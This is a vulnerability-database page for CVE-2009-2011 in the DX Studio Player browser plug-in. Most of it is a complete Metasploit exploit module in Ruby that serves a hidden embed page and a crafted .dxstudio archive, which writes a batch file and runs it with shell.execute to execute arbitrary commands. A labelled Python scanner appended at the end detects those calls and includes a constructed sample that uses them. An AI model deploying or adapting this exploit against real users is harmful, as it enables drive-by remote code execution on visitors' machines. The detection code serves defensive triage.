| Reporter | Title | Published | Views |
|---|---|---|---|
| zdt | DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln | 10 Jun 2009 00:00 | – |
| circl | CVE-2009-2011 | 10 Jun 2009 00:00 | – |
| coresecurity | DX Studio Player Firefox plug-in command injection | 9 Jun 2009 00:00 | – |
| cve | CVE-2009-2011 | 16 Jun 2009 20:26 | – |
| cvelist | CVE-2009-2011 | 16 Jun 2009 20:26 | – |
| exploitdb | Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection | 10 Jun 2009 00:00 | – |
| exploitpack | Worldweaver DX Studio Player 3.0.29.1 Firefox plugin - Command Injection | 10 Jun 2009 00:00 | – |
| metasploit | Worldweaver DX Studio Player shell.execute() Command Execution | 17 Feb 2010 20:14 | – |
| nvd | CVE-2009-2011 | 16 Jun 2009 21:00 | – |
| openvas | Ubuntu USN-785-1 (ipsec-tools) | 15 Jun 2009 00:00 | – |
```ruby
##
# $Id: dxstudio_player_exec.rb 9375 2010-05-26 22:39:56Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::CmdStagerVBS

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution',
      'Description' => %q{
          This module exploits a command execution vulnerability within the
        DX Studio Player from Worldweaver. The player is a browser plugin for
        IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web
        page referring to a specially crafted .dxstudio document, an attacker can
        execute arbitrary commands.

        Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and
        IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow
        the plug-in to access local files. This prompt appears to occur only once per
        server host.

        NOTE: This exploit uses additionally dangerous script features to write to
        local files!
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'jduck' ],
      'Version' => '$Revision: 9375 $',
      'References' =>
        [
          [ 'CVE', '2009-2011' ],
          [ 'BID', '35273' ],
          [ 'OSVDB', '54969' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/8922' ],
          [ 'URL', 'http://dxstudio.com/guide.aspx' ]
        ],
      'Payload' =>
        {
          'Space' => 2048,
        },
      'Platform' => 'win',
      # 'Arch' => ARCH_CMD,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'Jun 09 2009',
      'DefaultTarget' => 0))
  end

  def on_request_uri(cli, request)

    url_base = "http://"
    url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    url_base += ":" + datastore['SRVPORT'] + get_resource()
    payload_url = url_base + "/payload"

    # handle request for the payload
    if (request.uri.match(/payload/))

      # build the payload
      return if ((p = regenerate_payload(cli)) == nil)
      cmds = generate_cmdstager({:linemax => 2047}, p)
      scr = ""
      cmds.each { |ln|
        scr << "f.writeString('"
        scr << ln
        scr << "\\n');\n"
      }

      # make header.xml
      hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("BATNAME");
f.writeString('@echo off\\n');
CMDS
f.close();
shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
      hdrxml.gsub!(/CMDS/, scr);
      bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
      hdrxml.gsub!(/BATNAME/, bat_name);

      # craft the zip archive
      zip = Rex::Zip::Archive.new
      zip.add_file("header.xml", hdrxml)
      data = zip.pack

      print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

      # Handle the payload
      # handler(cli)
      return
    end

    # otherwise, send the html..
    html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="DXURL" />
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|

    print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the compressed response to the client
    html.gsub!(/DXURL/, payload_url)
    send_response(cli, html, { 'Content-Type' => 'text/html' })

  end

end

=begin
TODO:
- make it more quiet
- auto-migrate?
=end
```
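
A defender-side triage check for the document format the module above serves, added here as an example that is not part of the Metasploit module or the original page: it opens a `.dxstudio` file as a zip archive and flags a `header.xml` whose script calls `shell.execute` or `system.file.openWrite`. The function names, verdict strings, size cap and both sample archives are assumptions constructed for illustration.

```python
import io
import re
import zipfile

# Script calls that the page's header.xml relies on.
RISKY_CALLS = {
    "shell.execute": re.compile(r"shell\s*\.\s*execute\s*\("),
    "system.file.openWrite": re.compile(r"system\s*\.\s*file\s*\.\s*openWrite\s*\("),
}
MAX_HEADER_BYTES = 1 << 20  # assumed cap on header.xml before inflating


def scan_dxstudio(blob):
    """Classify a .dxstudio file by the script calls in its header.xml."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return {"verdict": "not-a-zip", "calls": []}
    with archive:
        # Assumption: the member name is matched case-insensitively.
        members = [m for m in archive.infolist() if m.filename.lower() == "header.xml"]
        if not members:
            return {"verdict": "no-header", "calls": []}
        if any(m.file_size > MAX_HEADER_BYTES for m in members):
            return {"verdict": "header-too-large", "calls": []}
        calls = set()
        for member in members:  # a zip may hold duplicate member names
            try:
                text = archive.read(member).decode("utf-8", errors="replace")
            except (zipfile.BadZipFile, RuntimeError, NotImplementedError):
                return {"verdict": "unreadable-header", "calls": []}
            calls.update(n for n, rx in RISKY_CALLS.items() if rx.search(text))
    return {"verdict": "suspicious" if calls else "clean", "calls": sorted(calls)}


def make_sample(script):
    """Build a constructed .dxstudio-style archive (zip with header.xml)."""
    xml = ('<?xml version="1.0"?>\n<dxstudio>\n<script><![CDATA[%s]]>\n'
           '</script>\n</dxstudio>\n' % script)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("header.xml", xml)
    return buf.getvalue()


# Constructed samples: one inert script, one using both flagged calls.
BENIGN = make_sample("function onInit() { }")
FLAGGED = make_sample('function onInit() { var f = system.file.openWrite("placeholder.bat");'
                      ' f.close(); shell.execute("placeholder.bat"); }')
```

A "clean" verdict only means neither call appears literally in `header.xml`; it is a triage signal, not proof that the document is safe.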